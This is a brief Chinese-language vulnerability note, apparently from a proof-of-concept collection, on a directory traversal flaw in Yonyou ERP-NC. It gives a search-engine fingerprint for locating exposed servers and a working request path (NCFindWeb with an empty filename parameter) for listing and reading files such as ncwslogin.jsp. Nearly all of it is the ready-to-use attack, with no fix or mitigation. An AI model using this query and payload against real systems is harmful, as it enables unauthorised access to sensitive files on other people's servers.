用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
Note
用友ERP-NC
app="用友-UFIDA-NC"
POC为
/NCFindWeb?service=IPreAlertConfigService&filename=
查看 ncwslogin.jsp 文件
YongYou ERP-NC directory traversal
